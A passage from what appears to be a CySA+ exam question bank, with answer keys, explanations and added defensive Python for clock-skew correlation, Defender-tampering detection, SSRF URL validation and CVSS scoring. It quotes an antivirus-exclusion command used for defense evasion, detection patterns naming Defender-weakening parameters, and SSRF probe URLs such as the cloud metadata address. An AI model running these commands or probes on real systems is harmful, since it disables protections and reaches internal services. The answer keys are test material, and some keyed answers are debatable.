QUESTION 64
Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical
vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the
patch cannot be deployed due to planned, routine system upgrades.

Which of the following is the best method to remediate the bugs?

A. Reschedule the upgrade and deploy the patch


B. Request an exception to exclude the patch from installation
C. Update the risk register and request a change to the SLA
D. Notify the incident response team and rerun the vulnerability scan

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: When a patch cannot be deployed due to conflicting routine system upgrades, updating the
risk register and requesting a change to the Service Level Agreement (SLA) is a practical approach. It
allows for re-evaluation of the risk and adjustment of the SLA to reflect the current situation.

QUESTION 65
Which of the following techniques can help a SOC team to reduce the number of alerts related to the
internal security activities that the analysts have to triage?

A. Enrich the SIEM-ingested data to include all data required for triage.
B. Schedule a task to disable alerting when vulnerability scans are executing.
C. Filter all alarms in the SIEM with low severity.
D. Add a SOAR rule to drop irrelevant and duplicated notifications.

Correct Answer: B
Explanation

QUESTION 66
While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents
across different systems. Which of the following should be checked first?

A. If appropriate logging levels are set


B. NTP configuration on each system
C. Behavioral correlation settings
D. Data normalization rules

Correct Answer: B
Explanation

Explanation/Reference:
The NTP configuration on each system should be checked first, because correlation depends on every
source stamping its events with an accurate, consistent clock. NTP (Network Time Protocol) synchronizes
computer clocks over a network using a hierarchy of time sources identified by stratum numbers:
reference clocks such as atomic clocks or GPS receivers are stratum 0, the servers that synchronize
directly with them are stratum 1, and so on. NTP clients query several servers and use selection and
filtering algorithms to pick the best source and discipline their clocks accordingly [1]. If NTP is
inconsistent or misconfigured on a system, its log timestamps drift away from everyone else's, so events
that happened at the same moment appear minutes apart in the SIEM, and correlation rules that rely on
time windows either never fire or fire on unrelated events. That undermines security analysis as well as
compliance and auditing of the network [2][3]. Logging levels, behavioral correlation settings, and
normalization rules are also worth checking, but none of them helps while the clocks disagree.
References: How the Windows Time Service Works, Time Synchronization - All You Need To Know,
What is SIEM? | Microsoft Security
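
As an added example (not part of the original exam material), the following Python script shows the
failure mode described above: events from three hosts, one of which runs about four minutes fast, are
correlated once with the raw clocks and once after subtracting a measured per-host offset. The host
names, events and offsets are constructed for illustration; the offsets stand in for what an analyst would
read from chronyc tracking, ntpq -p or w32tm on each host.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample events from three hosts, stamped with each host's own clock.
# web01 is about four minutes fast because its NTP client is misconfigured;
# fw01 and db01 are synchronized. These records are illustrative only.
RAW_EVENTS = [
    ("fw01",  "2024-03-01T10:00:05Z", "allow 203.0.113.7 -> 10.0.0.5:443"),
    ("web01", "2024-03-01T10:04:07Z", "login failed user=admin src=203.0.113.7"),
    ("db01",  "2024-03-01T10:00:09Z", "query from 10.0.0.5 table=users"),
]

# Per-host clock offset in seconds versus a trusted reference (positive = the
# host's clock runs ahead). In practice these come from `chronyc tracking`,
# `ntpq -p` or `w32tm /stripchart` on each host, or from the collector's skew check.
CLOCK_OFFSETS = {"fw01": 0.0, "web01": 242.0, "db01": 0.5}


def parse_ts(text):
    """Parse an ISO-8601 UTC timestamp with a trailing Z."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalize(events, offsets=None):
    """Return (host, corrected_time, message) tuples with per-host skew removed,
    sorted by corrected time. Without offsets the raw timestamps are used as-is."""
    offsets = offsets or {}
    corrected = []
    for host, ts, msg in events:
        corrected.append((host, parse_ts(ts) - timedelta(seconds=offsets.get(host, 0.0)), msg))
    return sorted(corrected, key=lambda e: e[1])


def correlate(events, window_seconds, offsets=None):
    """Cluster events whose corrected times fall within window_seconds of the
    previous event in the cluster. Returns a list of clusters, each a list of
    host names in time order."""
    clusters, current = [], []
    for event in normalize(events, offsets):
        if current and (event[1] - current[-1][1]).total_seconds() > window_seconds:
            clusters.append(current)
            current = []
        current.append(event)
    if current:
        clusters.append(current)
    return [[host for host, _, _ in cluster] for cluster in clusters]


def skewed_hosts(offsets, tolerance_seconds=1.0):
    """Hosts whose clock offset exceeds the tolerance: fix their NTP configuration
    before trusting any cross-host correlation that involves them."""
    return sorted(host for host, off in offsets.items() if abs(off) > tolerance_seconds)


if __name__ == "__main__":
    print("raw clocks:           ", correlate(RAW_EVENTS, 30))
    print("skew corrected:       ", correlate(RAW_EVENTS, 30, CLOCK_OFFSETS))
    print("hosts needing NTP fix:", skewed_hosts(CLOCK_OFFSETS))
```

With the raw clocks the firewall and database events cluster together and the web server's failed login
lands in a separate cluster four minutes away; after the offset is removed all three fall inside a 30-second
window. Correcting offsets in the collector is a stop-gap for forensics on existing logs; the fix is the NTP
configuration on web01.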

QUESTION 67
During an internal code review, software called "ACE" was discovered to have a vulnerability that allows
the execution of arbitrary code. The vulnerability is in a legacy, third-party vendor resource that is used by
the ACE software. ACE is used worldwide and is essential for many businesses in this industry.
Developers informed the Chief Information Security Officer that removal of the vulnerability will take time.
Which of the following is the first action to take?

A. Look for potential IoCs in the company.


B. Inform customers of the vulnerability.
C. Remove the affected vendor resource from the ACE software.
D. Develop a compensating control until the issue can be fixed permanently.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A compensating control is an alternative measure that provides a similar level of protection as
the original control, but is used when the original control is not feasible or cost-effective. In this case, the
CISO should develop a compensating control to mitigate the risk of the vulnerability in the ACE software,
such as implementing additional monitoring, firewall rules, or encryption, until the issue can be fixed
permanently by the developers. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition,
Chapter 5, page 197; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 205.

QUESTION 68
An analyst is conducting monitoring against an authorized team that will perform adversarial techniques.
The analyst interacts with the team twice per day to set the stage for the techniques to be used. Which of
the following teams is the analyst a member of?

A. Orange team
B. Blue team
C. Red team
D. Purple team

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The correct answer is A. Orange team.

In the extended "infosec color wheel" model, an orange team facilitates and trains other teams. It works
alongside the yellow team (the builders: developers, architects and system administrators) to help them
understand attacker behavior, the risks it creates, and the roles of the red, blue, and purple teams [1][2].
In this scenario the analyst is conducting monitoring against an authorized team that will perform
adversarial techniques, that is, observing and evaluating a team that simulates real-world attacks against
the organization's systems or networks. That team could be a red team or a purple team, depending on
whether it works independently or collaboratively with the defenders [3][4][5]. The analyst interacts with
the team twice per day to set the stage for the techniques to be used: providing guidance and feedback on
how to conduct the testing and which techniques to use, and setting up scenarios, objectives, rules of
engagement, and success criteria. That is a facilitation and training role, which places the analyst on an
orange team [1][2]. The other options do not match the analyst's role in this scenario.
Option B is incorrect because a blue team is the defensive team that monitors and protects the
organization's systems and networks from real or simulated attacks. It defends against the adversarial
techniques rather than facilitating the team that performs them [3][4][5].
Option C is incorrect because a red team is the offensive team that discovers and exploits vulnerabilities
in the organization's systems or networks by simulating real-world attacks. It performs the adversarial
techniques rather than monitoring the team that does [3][4][5].
Option D is incorrect because a purple team is not a separate team but a collaborative exercise in which
the red and blue teams work together to improve the organization's overall security. It works with the
adversarial team rather than facilitating and observing it from outside [3][4][5].
References:
[1] Infosec Color Wheel & The Difference Between Red & Blue Teams
[2] The colors of cybersecurity - UW-Madison Information Technology
[3] Red Team vs. Blue Team vs. Purple Team Compared - U.S. Cybersecurity
[4] Red Team vs. Blue Team vs. Purple Team: What's The Difference? | Varonis
[5] Red, blue, and purple teams: Cybersecurity roles explained | Pluralsight Blog

QUESTION 69
A team of analysts is developing a new internal system that correlates information from a variety of
sources, analyzes that information, and then triggers notifications according to company policy.

Which of the following technologies was deployed?

A. SIEM
B. SOAR
C. IPS
D. CERT

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: SIEM (Security Information and Event Management) technology aggregates and analyzes
activity from many different resources across your IT infrastructure. The description of correlating
information from various sources and triggering notifications aligns with the capabilities of a SIEM system.

QUESTION 70
Which of the following statements best describes the MITRE ATT&CK framework?

A. It provides a comprehensive method to test the security of applications.


B. It provides threat intelligence sharing and development of action and mitigation strategies.
C. It helps identify and stop enemy activity by highlighting the areas where an attacker functions.
D. It tracks and understands threats and is an open-source project that evolves.
E. It breaks down intrusions into a clearly defined sequence of phases.

Correct Answer: D
Explanation

Explanation/Reference:
The MITRE ATT&CK framework is a knowledge base of adversary behavior built from observed tactics,
techniques and procedures (TTPs). It helps security teams model, detect, prevent and respond to threats:
emulating adversaries, writing detection logic and security controls, building incident response plans, and
sharing a common vocabulary with other security professionals. It is freely available and evolves with
input from a global community of cybersecurity professionals [1]. Option E describes the Cyber Kill Chain,
and option B describes a threat intelligence sharing platform rather than ATT&CK itself. References:
[1] What is the MITRE ATT&CK Framework? | IBM

QUESTION 71
An employee downloads a freeware program to change the desktop to the classic look of legacy Windows.
Shortly after the employee installs the program, a high volume of random DNS queries begin to originate
from the system. An investigation on the system reveals the following:

Add-MpPreference -ExclusionPath '%Program Files%\ksysconfig'

Which of the following is possibly occurring?

A. Persistence
B. Privilege escalation
C. Credential harvesting
D. Defense evasion

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: Defense evasion is the tactic of avoiding detection or prevention by security tools. Here the
freeware "classic desktop" program is most likely malware: the high volume of random DNS queries is
typical of a domain generation algorithm locating a command-and-control server, or of DNS tunnelling used
to exfiltrate data. The command Add-MpPreference -ExclusionPath '%Program Files%\ksysconfig' adds a
folder exclusion to Microsoft Defender Antivirus, the built-in antivirus, so that the malware's directory is
never scanned. MITRE ATT&CK classifies this as Impair Defenses: Disable or Modify Tools (T1562.001).
Persistence, privilege escalation and credential harvesting are not shown by this command, even though
the program may also do those. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition,
Chapter 5, page 204; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 212.
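
The exclusion command is a detectable event on its own. As an added example that is not from the exam
or from any vendor, the following Python detector scans constructed log records shaped like PowerShell
script-block logs (Event ID 4104) and Microsoft Defender configuration-change events (Event ID 5007) for
exclusion changes, tags them with ATT&CK T1562.001, and flags hosts where both the command and
Defender's own confirmation were seen. The host names and the exact message text are constructed;
only the cmdlet and parameter names and the Defender Exclusions registry path are real.

```python
import re

# Constructed sample log records (not from the exam or a real host): a
# PowerShell script-block log entry and a Defender configuration-change entry
# from one workstation, plus a benign script-block entry from another.
SAMPLE_LOGS = [
    {"host": "ws-042", "source": "Microsoft-Windows-PowerShell/Operational", "event_id": 4104,
     "message": "Creating Scriptblock text (1 of 1):\n"
                "Add-MpPreference -ExclusionPath '%ProgramFiles%\\ksysconfig'"},
    {"host": "ws-042", "source": "Microsoft-Windows-Windows Defender/Operational", "event_id": 5007,
     "message": "Microsoft Defender Antivirus Configuration has changed. "
                "New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\"
                "C:\\Program Files\\ksysconfig = 0x0"},
    {"host": "ws-017", "source": "Microsoft-Windows-PowerShell/Operational", "event_id": 4104,
     "message": "Creating Scriptblock text (1 of 1):\nGet-MpComputerStatus"},
]

# Add-MpPreference / Set-MpPreference parameters that weaken Defender. The
# cmdlets and parameter names are real; which ones count as "tampering" is
# this example's choice.
TAMPER_CMDLET = re.compile(
    r"(?i)\b(?:Add|Set)-MpPreference\b[^\n]*?"
    r"-(ExclusionPath|ExclusionExtension|ExclusionProcess|DisableRealtimeMonitoring)\b\s*([^\n]*)")

# Registry location Defender reports in its own 5007 configuration-change event.
EXCLUSION_REGKEY = re.compile(
    r"(?i)Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\\([^=\n]+?)\s*=")


def detect_defender_tampering(records):
    """Return one finding per record that adds a Defender exclusion or turns
    protection off, tagged with ATT&CK T1562.001 (Impair Defenses)."""
    findings = []
    for rec in records:
        msg = rec["message"]
        if rec["event_id"] == 4104:
            m = TAMPER_CMDLET.search(msg)
            if m:
                findings.append({"host": rec["host"], "event_id": 4104, "technique": "T1562.001",
                                 "parameter": m.group(1),
                                 "value": m.group(2).strip().strip("'\"")})
        elif rec["event_id"] == 5007:
            m = EXCLUSION_REGKEY.search(msg)
            if m:
                findings.append({"host": rec["host"], "event_id": 5007, "technique": "T1562.001",
                                 "parameter": "Exclusion" + m.group(1),
                                 "value": m.group(2).strip()})
    return findings


def corroborated_hosts(findings):
    """Hosts where both the command (4104) and Defender's own confirmation
    (5007) were seen: the highest-confidence alerts, to triage first."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["event_id"])
    return sorted(h for h, ids in by_host.items() if {4104, 5007} <= ids)


if __name__ == "__main__":
    hits = detect_defender_tampering(SAMPLE_LOGS)
    for h in hits:
        print(f'{h["host"]} event {h["event_id"]} {h["technique"]}: {h["parameter"]} = {h["value"]}')
    print("corroborated:", corroborated_hosts(hits))
```

Script-block logging (4104) has to be enabled by policy for the first pattern to see anything; the 5007
event is generated by Defender itself, so it still fires when the attacker uses the registry or WMI instead
of PowerShell, which is why the two sources are matched rather than relying on either alone.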

QUESTION 72
A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will
act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?
A. Reconnaissance
B. Weaponization
C. Exploitation
D. Installation

Correct Answer: B
Explanation

Explanation/Reference:
Weaponization is the stage of the Cyber Kill Chain where the attacker creates or modifies a malicious
payload to use against a target. In this case, the disgruntled open-source developer has created a logic
bomb that will act as a wiper, which is a type of malware that destroys data on a system. This is an
example of weaponization, as the developer has prepared a cyberweapon to sabotage the code
repository. References (the answer draws on the following sources):
Cyber Kill Chain | Lockheed Martin, which states: "In the weaponization step, the adversary creates
remote access malware weapon, such as a virus or worm, tailored to one or more vulnerabilities."
The Cyber Kill Chain: The Seven Steps of a Cyberattack - EC-Council, which states: "In the weaponization
stage, all of the attacker's preparatory work culminates in the creation of malware to be used against an
identified target."
What is the Cyber Kill Chain? Introduction Guide - CrowdStrike, which states: "Weaponization: The
attacker creates a malicious payload that will be delivered to the target."

QUESTION 73
Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies
regarding versions and patches in the existing infrastructure are discovered. Which of the following is the
best solution to decrease the inconsistencies?

A. Implementing credentialed scanning


B. Changing from a passive to an active scanning approach
C. Implementing a central place to manage IT assets
D. Performing agentless scanning

Correct Answer: C
Explanation

Explanation/Reference:
Implementing a central place to manage IT assets is the best solution to decrease the inconsistencies
regarding versions and patches in the existing infrastructure. A central asset inventory, such as a
configuration management database (CMDB), gives the vulnerability assessment team and every other
team an accurate, up-to-date record of the hardware and software components in the network, their
relationships and dependencies, and the changes and updates made to them, so everyone compares
versions and patch levels against the same single source of truth [1][2]. Credentialed scanning, moving
from passive to active scanning, and agentless scanning all improve the accuracy of the scan itself, but
they do not address the root cause of the inconsistencies, which is that the teams are working from
different asset records [3]. References: [1] What is a Configuration Management Database (CMDB)?,
[2] How to Use a CMDB to Improve Vulnerability Management, [3] Vulnerability Scanning Best Practices

QUESTION 74
An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is
to create a server image that can be deployed with a secure template. Which of the following is the best
resource to ensure secure configuration?

A. CIS Benchmarks
B. PCI DSS
C. OWASP Top Ten
D. ISO 27001

Correct Answer: A
Explanation

Explanation/Reference:
The best resource to ensure secure configuration of cloud infrastructure is A. CIS Benchmarks. CIS
Benchmarks are prescriptive, setting-by-setting configuration recommendations for many technologies,
including the major cloud providers, operating systems, network devices, and server software. They are
developed by a global community of cybersecurity experts and are the natural basis for a hardened
server image or deployment template [1]. PCI DSS, OWASP Top Ten, and ISO 27001 are important
standards, but none of them provides specific hardening guidance for a cloud image: PCI DSS is a
compliance scheme for payment card data, OWASP Top Ten is a list of common web application security
risks, and ISO 27001 is a framework for establishing and maintaining an information security
management system. They may shape requirements for cloud security, but they are not configuration
baselines the way CIS Benchmarks are. References: [1] CIS Benchmarks | Center for Internet Security

QUESTION 75
Following an incident, a security analyst needs to create a script for downloading the configuration of all
assets from the cloud tenancy. Which of the following authentication methods should the analyst use?

A. MFA
B. User and password
C. PAM
D. Key pair

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A script that runs unattended needs a non-interactive credential. Key pair authentication (an
API signing key or SSH key pair, where the private key stays with the script and the public key is registered
with the cloud tenancy) fits that requirement and avoids embedding a reusable password. MFA requires a
person to supply the second factor, so it cannot be scripted; a user name and password is a weaker,
phishable, reusable secret; and PAM (privileged access management) is a process and tooling for
controlling privileged accounts rather than an authentication method in itself. The key should be scoped to
read-only configuration access, stored in a secrets manager rather than in the script, and revoked when
the work is done. References: Authentication Methods - Configuring Tenant-Wide Settings in Azure ...,
Cloud Foundation - Oracle Help Center

QUESTION 76
A security analyst noticed the following entry on a web server log:

Warning: fopen(http://127.0.0.1:16): failed to open stream: Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

A. XSS
B. CSRF
C. SSRF
D. RCE

Correct Answer: C
Explanation

Explanation/Reference:
The malicious activity most likely attempted is SSRF (Server-Side Request Forgery), an attack in which a
vulnerable web application is coerced into making requests to other resources on behalf of the web server.
Here showimage.php passes an attacker-supplied URL to PHP's fopen (which accepts URLs only when
allow_url_fopen is enabled), and the attacker pointed it at the loopback address 127.0.0.1 on port 16, a
port that is not meant to be reachable from the internet. The "Connection refused" warning shows that
port 16 was closed; an attacker who iterates over ports and reads the differing error messages can map
which internal services are listening, which is why such errors must never be returned to the client. XSS
and CSRF are client-side attacks that would not produce a server-side fopen warning, and nothing in the
entry shows code being executed (RCE). References: CompTIA CySA+ Study Guide: Exam CS0-003,
3rd Edition, Chapter 2: Software and Application Security, page 66.
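
As an added example written for this page (not from the exam and not PHP), the following Python shows
the check that showimage.php was missing. It assumes the script took the image URL from a request
parameter and handed it straight to fopen. is_safe_url allows only http(s) on ports 80/443, rejects URLs
with embedded credentials, and refuses any hostname that resolves to a loopback, private, link-local or
otherwise internal address, including IPv4-mapped IPv6 forms; the resolver is injectable so the logic can
run offline against a constructed DNS table. fetch_image_hardened wraps it and returns a generic error
instead of the raw "Connection refused" text that told the attacker the port state.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed DNS table for offline use; a real deployment resolves via the OS.
FAKE_DNS = {
    "cdn.example.com": {"93.184.216.34"},   # public address
    "intranet.corp": {"10.0.0.5"},          # private address: must be refused
}


def fake_resolver(hostname):
    return FAKE_DNS.get(hostname, set())


def system_resolver(hostname):
    """Default resolver: every A/AAAA record for the name (needs network)."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def _is_internal(addr):
    """True for any address the server must never fetch on a user's behalf."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def is_safe_url(url, resolver=system_resolver):
    """Return True only for an http(s) URL on a standard port, without embedded
    credentials, whose host resolves exclusively to public addresses."""
    try:
        parts = urlsplit(url)
        port = parts.port                  # raises ValueError on a bad port
    except ValueError:
        return False
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username or parts.password:
        return False
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False
    try:
        addrs = {ipaddress.ip_address(parts.hostname)}      # literal IP in URL
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolver(parts.hostname)}
        except (socket.gaierror, OSError, ValueError):
            return False
    return bool(addrs) and not any(_is_internal(a) for a in addrs)


def fetch_image_hardened(url, fetcher, resolver=system_resolver):
    """Replacement for the fopen($_GET['url']) pattern: validate first and return a
    generic error, never the underlying network error message."""
    if not is_safe_url(url, resolver):
        return None, "invalid image URL"
    # `fetcher` must connect to the address just validated (not re-resolve, to
    # avoid DNS rebinding) and must not follow redirects without re-checking.
    return fetcher(url), None


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:16", "http://169.254.169.254/latest/meta-data/",
                      "http://intranet.corp/report.png", "https://cdn.example.com/logo.png"):
        print(candidate, "->", is_safe_url(candidate, fake_resolver))
```

The probe from the log, http://127.0.0.1:16, is rejected on the port check before any resolution happens;
the cloud metadata address, an internal hostname, and an IPv4-mapped loopback literal are all rejected on
the address check. Validation at the URL layer alone is not enough: the HTTP client must also refuse
redirects to internal targets and connect to the address that was validated.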

QUESTION 77
Which of following would best mitigate the effects of a new ransomware attack that was not properly
stopped by the company antivirus?
A. Install a firewall.
B. Implement vulnerability management.
C. Deploy sandboxing.
D. Update the application blocklist.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Sandboxing is a technique that isolates potentially malicious programs or files in a controlled
environment, preventing them from affecting the rest of the system. It can help mitigate the effects of a new
ransomware attack by preventing it from encrypting or deleting important data or spreading to other
devices. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5, page 202;
CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 210.

QUESTION 78
A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning
project:

Must use minimal network bandwidth
Must use minimal host resources
Must provide accurate, near real-time updates
Must not have any stored credentials in configuration on the scanner

Which of the following vulnerability scanning methods should be used to best meet these requirements?

A. Internal
B. Agent
C. Active
D. Uncredentialed

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Agent-based vulnerability scanning is a method that uses software agents installed on the
target systems to scan for vulnerabilities. This method meets the requirements of the project because it
uses minimal network bandwidth and host resources, provides accurate and near real-time updates, and
does not require any stored credentials on the scanner. References: What Is Vulnerability Scanning?
Types, Tools and Best Practices, Section: Types of vulnerability scanning; CompTIA CySA+ Study Guide:
Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 154.

QUESTION 79
Exploit code for a recently disclosed critical software vulnerability was publicly available for download for
several days before being removed. Which of the following CVSS v3.1 temporal metrics was most
impacted by this exposure?

A. Remediation level
B. Exploit code maturity
C. Report confidence
D. Availability

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Exploit code maturity (E) is the CVSS v3.1 temporal metric that reflects how reliable and
widely available exploit code for a vulnerability is, with the values Unproven (U, 0.91), Proof-of-Concept
(P, 0.94), Functional (F, 0.97) and High (H, 1.0); Not Defined (X) leaves the score unchanged. Working
exploit code being publicly downloadable moves E from U or P toward F or H, and that raises the temporal
score. Remediation level records whether an official fix, temporary fix or workaround exists, report
confidence records how well the vulnerability is corroborated, and availability is a base impact metric
rather than a temporal one, so none of those is what the exposure changed. Removing the download after
a few days does not reverse the change: code that has circulated is still in attackers' hands.
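
As an added example that is not part of the original exam explanation, the following Python computes the
CVSS v3.1 temporal score from the published metric weights and shows how the Exploit Code Maturity
value alone moves the score of a vulnerability when exploit code goes from Unproven to Functional. The
base score of 9.8 and the remediation-level and report-confidence values used in the demonstration are
assumptions chosen for illustration.

```python
import math

# CVSS v3.1 temporal metric weights (FIRST CVSS v3.1 Specification, metric
# values table). X = Not Defined, which leaves the base score unchanged.
EXPLOIT_CODE_MATURITY = {"X": 1.00, "U": 0.91, "P": 0.94, "F": 0.97, "H": 1.00}
REMEDIATION_LEVEL = {"X": 1.00, "O": 0.95, "T": 0.96, "W": 0.97, "U": 1.00}
REPORT_CONFIDENCE = {"X": 1.00, "U": 0.92, "R": 0.96, "C": 1.00}


def roundup(value):
    """CVSS v3.1 Roundup (spec Appendix A): the smallest one-decimal number
    >= value, computed on integers to avoid floating-point surprises."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def temporal_score(base_score, e="X", rl="X", rc="X"):
    """Temporal = Roundup(Base x E x RL x RC); a base score of 0 stays 0."""
    if base_score == 0:
        return 0.0
    return roundup(base_score
                   * EXPLOIT_CODE_MATURITY[e]
                   * REMEDIATION_LEVEL[rl]
                   * REPORT_CONFIDENCE[rc])


def temporal_vector(e="X", rl="X", rc="X"):
    return f"E:{e}/RL:{rl}/RC:{rc}"


def exploit_release_impact(base_score, before="U", after="F", rl="O", rc="C"):
    """Score before and after exploit code becomes public, holding RL and RC
    fixed so the change attributable to E alone is visible."""
    return (temporal_score(base_score, before, rl, rc),
            temporal_score(base_score, after, rl, rc))


if __name__ == "__main__":
    base = 9.8   # assumed base score for the demonstration
    for e in ("U", "P", "F", "H"):
        print(temporal_vector(e, "O", "C"), "->", temporal_score(base, e, "O", "C"))
    print("before/after public exploit:", exploit_release_impact(base))
```

With an official fix available (RL:O) and a confirmed report (RC:C), a 9.8 base score becomes 8.5 while
exploit code is unproven and 9.1 once functional exploit code is public; the availability impact and the
remediation level have not changed, only E has. In CVSS v4.0 the temporal group is replaced by the Threat
metric group, whose single Exploit Maturity metric plays the same role.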

QUESTION 80
Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and
vulnerabilities with the likelihood and impact of occurrence?

A. Risk register
B. Vulnerability assessment
C. Penetration test
D. Compliance report

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: A risk register is a useful tool for mapping, tracking, and mitigating identified threats and
vulnerabilities with the likelihood and impact of occurrence. A risk register is a document that records the
details of all the risks identified in a project or an organization, such as their sources, causes,
consequences, probabilities, impacts, owners, and mitigation strategies. It lets the security team prioritize
risks by severity and urgency and monitor and control them throughout the project or the organization's
lifecycle [1][2]. A vulnerability assessment, a penetration test, and a compliance report are methods or
outputs for identifying and evaluating threats and vulnerabilities; their findings feed the register, but they
are not themselves tools for mapping, tracking, and mitigating the risks over time [3][4][5]. References:
[1] What is a Risk Register? | Smartsheet, [2] Risk Register: Definition & Example, [3] Vulnerability
Assessment vs. Penetration Testing: What's the Difference?, [4] What is a Penetration Test and How Does
It Work?, [5] What is a Compliance Report? | Definition, Types, and Examples

QUESTION 81
An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds
continue to work. Which of the following is the most likely reason the firewall feed stopped working?

A. The firewall service account was locked out.


B. The firewall was using a paid feed.
C. The firewall certificate expired.
D. The firewall failed open.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The firewall certificate expired. Because the other open intelligence feeds still work, the
analyst's platform and its outbound connectivity are fine; the failure is specific to the firewall feed. If that
feed is delivered or fetched over a TLS connection authenticated with the firewall's certificate, the
connection fails validation as soon as the certificate expires, and the feed stops until the certificate is
renewed or replaced. The analyst can confirm this from the TLS handshake error in the collector's logs or
by checking the certificate's expiry date. A locked-out service account or a lapsed paid subscription would
also be worth ruling out, but the question gives no indication of either. References: CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 161.

QUESTION 82
An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline.
Which of the following should the analyst focus on in order to move the incident forward?

A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The analyst should focus on impact in order to move the incident forward. Impact is the
measure of the potential or actual damage caused by an incident, such as data loss, financial loss,
reputational damage, or regulatory penalties. Ranking events by impact lets the analyst prioritize the ones
that matter to the timeline, allocate the appropriate resources and actions to contain and remediate them,
and communicate status and justify decisions to stakeholders and customers [1][2]. Vulnerability score,
mean time to detect, and isolation all matter in incident response, but none of them is the basis for
prioritizing a backlog of events: a vulnerability score rates the likelihood and severity of a vulnerability
being exploited, mean time to detect is an average of how long discovery takes, and isolation is the
containment step of disconnecting an affected system from the network to prevent further damage or
spread [3][4][5]. References: [1] Incident Response: Processes, Best Practices & Tools - Atlassian,
[2] Incident Response Metrics: What You Should Be Measuring, [3] Vulnerability Scanning Best Practices,
[4] How to Track Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR) to Cybersecurity
Incidents, [5] Isolation and Quarantine for Incident Response

QUESTION 83
Which of the following best describes the key elements of a successful information security program?

A. Business impact analysis, asset and change management, and security communication plan
B. Security policy implementation, assignment of roles and responsibilities, and information asset
classification
C. Disaster recovery and business continuity planning, and the definition of access control requirements
and human resource policies
D. Senior management organizational structure, message distribution standards, and procedures for the
operation of security management systems

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: A successful information security program consists of several key elements that align with the
organization's goals and objectives and address the risks and threats to its information assets.
Security policy implementation: developing, documenting, and enforcing the rules and standards that
govern the security of the organization's information assets. Security policies define the scope, objectives,
roles, and responsibilities of the security program, as well as the acceptable use, access control, incident
response, and compliance requirements for the information assets.
Assignment of roles and responsibilities: identifying and assigning the specific tasks and duties of the
security program to the appropriate individuals or groups within the organization. Roles and
responsibilities define who is accountable, responsible, consulted, and informed for each security activity,
such as risk assessment, vulnerability management, threat detection, incident response, auditing, and
reporting.
Information asset classification: categorizing the information assets based on their value, sensitivity, and
criticality to the organization. Classification determines the appropriate level of protection and controls for
each asset, as well as the impact and likelihood of a security breach or loss, and lets security resources
and effort be prioritized by the risk level of each asset.

QUESTION 84
A security audit for unsecured network services was conducted, and the following output was generated:
Which of the following services should the security team investigate further? (Select two).

A. 21
B. 22
C. 23
D. 636
E. 1723
F. 3389

Correct Answer: CD
Explanation

Explanation/Reference:
Explanation: The output (a port scan result, not reproduced here) lists six open ports on the target host
with the service name and version bound to each. Port scanning is used by attackers to find exposed
services to exploit and by defenders to audit their own exposure; the service name and version reveal the
protocol in use and whether known weaknesses apply [1].
Of the six, the two that should be investigated further are port 23 and port 636. Port 23 is Telnet, an old
remote-login and command-execution protocol that sends everything, including user names and
passwords, in cleartext, so sessions can be read or modified by anyone on the path, and Telnet daemons
have a long history of flaws that allow unauthorized access, arbitrary command execution, or denial of
service [2][3]. Port 636 is LDAP over SSL/TLS (LDAPS), the TLS-wrapped form of directory access. It is
only as strong as its certificate handling: self-signed or expired certificates, clients that do not validate the
server certificate, and servers that still negotiate old TLS versions or weak cipher suites all allow
